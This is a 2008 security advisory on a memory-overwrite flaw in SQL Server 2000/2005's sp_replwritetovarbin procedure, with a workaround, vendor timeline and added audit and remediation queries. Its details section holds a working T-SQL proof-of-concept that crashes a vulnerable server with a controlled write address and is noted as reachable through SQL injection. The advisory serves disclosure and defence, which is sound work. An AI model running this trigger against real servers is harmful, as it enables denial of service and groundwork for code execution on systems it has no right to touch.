Microsoft SQL Server sp_replwritetovarbin

SEC Consult Security Advisory < 20081209-0 >


title: Microsoft SQL Server sp_replwritetovarbin

limited memory overwrite vulnerability

program: Microsoft SQL Server 2000

Microsoft SQL Server 2005

vulnerable version: SQL Server 2000 (current version, tested on 8.00.2039)

SQL Server 2005 (current version, tested on 9.00.1399.06)

found: 2008-04-12

by: Bernhard Mueller (SEC Consult Vulnerability Lab)

perm. link:



Product description:



Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.



Vulnerability overview:



By calling the extended stored procedure sp_replwritetovarbin and supplying several uninitialized variables as its OUTPUT parameters, it is possible to trigger a memory write to an attacker-controlled location. Depending on the underlying Windows version, this write can be turned into arbitrary code execution in the context of the SQL Server process.

In a default configuration, the sp_replwritetovarbin extended stored procedure can be executed by any database user. The vulnerability can therefore be exploited by any authenticated user with a direct database connection, or remotely through SQL injection in a vulnerable web application.

This vulnerability has been confirmed on SQL Server 2000/2005 (SQL Server 2008 has not been tested).
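The following T-SQL audit query is an added example and is not part of the SEC Consult advisory. It shows whether sp_replwritetovarbin is still registered in master and whether a low-privileged user can execute it, which is the precondition described above. It assumes the SQL Server 2005 catalog views (sys.objects, sys.database_permissions, sys.database_principals) and HAS_PERMS_BY_NAME; on SQL Server 2000 the same questions are answered from master..sysobjects (xtype = 'X') and master..sysprotects.

```sql
-- Added audit query; not part of the SEC Consult advisory.
-- Assumes SQL Server 2005 catalog views and HAS_PERMS_BY_NAME.
-- On SQL Server 2000 use master..sysobjects (xtype = 'X') and master..sysprotects.
USE master;

-- 1. Is the extended stored procedure registered at all?
SELECT name, type_desc, create_date
FROM sys.objects
WHERE name = 'sp_replwritetovarbin'
  AND type = 'X';                      -- X = extended stored procedure

-- 2. Explicit EXECUTE grants on the procedure (on a default install
--    this is where a grant to 'public' shows up).
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1                     -- object-level permissions
  AND pe.major_id = OBJECT_ID('master.dbo.sp_replwritetovarbin');

-- 3. Effective check as the guest user. A login that has no user mapped in
--    master (the usual case for a web application's login) is resolved to
--    guest there, so this is the view an injected query would have.
--    Impersonating guest requires IMPERSONATE, which sysadmin has.
EXECUTE AS USER = 'guest';
SELECT HAS_PERMS_BY_NAME('master.dbo.sp_replwritetovarbin', 'OBJECT', 'EXECUTE')
       AS guest_can_execute;           -- 1 = any login can reach the procedure
REVERT;
```

If step 1 returns a row and step 3 returns 1, the server is exposed to exactly the attack path described above: any authenticated connection, or any SQL injection point reachable over the web, can call the procedure.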



Vulnerability details:



The following T-SQL script can be used to test for the vulnerability. It builds a second batch as a string and runs it through sp_executesql; the inner batch declares the OUTPUT variables without initializing them and passes a 3000-character string of 'A' (0x41) as the controlled parameter:


DECLARE @buf NVARCHAR(4000),   -- outer buffer holding the dynamic SQL (size assumed)
        @val NVARCHAR(4),      -- filler character
        @counter INT

-- Inner batch: the output variables are deliberately left uninitialized.
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

-- 0x41 = 'A'; the filler ends up being interpreted as the write address.
SET @val = CHAR(0x41)

-- Append 3000 filler characters (BEGIN/END required, otherwise only the
-- counter increment would be repeated).
SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

-- Close the string argument and supply the remaining parameters.
SET @buf = @buf + ''',''1'',''1'',''1'', ''1'', ''1'', ''1'', ''1'', ''1'', ''1'''

-- Run the assembled batch.
EXEC master..sp_executesql @buf



On a vulnerable server this triggers an access violation exception: an attempted write to address 0x41414141, i.e. the 'A' filler is used as the destination pointer of the write.

The vulnerability has been successfully used to execute arbitrary code on a lab machine.

SEC Consult will not release code execution exploits for this vulnerability to the public.






Workaround:



Remove the sp_replwritetovarbin extended stored procedure. Run the following as an administrator (member of the sysadmin role) in the master database:


execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'


See also:


"Removing an Extended Stored Procedure from SQL Server"
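The following script is an added example, not part of the SEC Consult advisory. It applies the workaround above idempotently (drops the extended stored procedure only if it is still registered) and then verifies the result, so it can be re-run as a post-change check. It assumes the SQL Server 2005 catalog view sys.objects; on SQL Server 2000 test master..sysobjects with xtype = 'X' instead.

```sql
-- Added remediation script; not part of the SEC Consult advisory.
-- Run as a member of sysadmin. Assumes sys.objects (SQL Server 2005);
-- on SQL Server 2000 use master..sysobjects WHERE xtype = 'X'.
USE master;

-- Drop only if still registered, so the script is safe to re-run.
IF EXISTS (SELECT 1 FROM sys.objects
           WHERE name = 'sp_replwritetovarbin' AND type = 'X')
BEGIN
    EXECUTE dbo.sp_dropextendedproc 'sp_replwritetovarbin';
    PRINT 'sp_replwritetovarbin deregistered';
END
ELSE
    PRINT 'sp_replwritetovarbin not registered, nothing to do';

-- Verification: fail loudly if the procedure is still reachable, so the
-- script doubles as a compliance probe.
IF EXISTS (SELECT 1 FROM sys.objects
           WHERE name = 'sp_replwritetovarbin' AND type = 'X')
    RAISERROR('sp_replwritetovarbin is still registered', 16, 1);
ELSE
    PRINT 'verified: sp_replwritetovarbin is no longer registered';
```

Note that sp_dropextendedproc only removes the registration in master; the DLL that implements the procedure stays on disk. Re-run the verification after service packs or upgrades, since setup may re-register the procedure.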






Vendor status:



According to an email received from Microsoft in September 2008, a fix for this vulnerability has been completed.

The release schedule for this fix is currently unknown.



Vendor timeline:


Vendor notified: 2008-04-17

Vendor response: 2008-04-17

Last response from Microsoft: 2008-09-29

Request for update status 1: 2008-10-14

Request for update status 2: 2008-10-29

Request for update status 3: 2008-11-12

Request for update status 4 and prenotification about advisory release date: 2008-11-28

Public release: 2008-12-09

Update (added SQL Server 2005, thanks Moreno Zilli): 2008-12-10



SEC Consult Unternehmensberatung GmbH


Office Vienna

Mooslackengasse 17

A-1190 Vienna



Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com


EOF Bernhard Mueller / @2008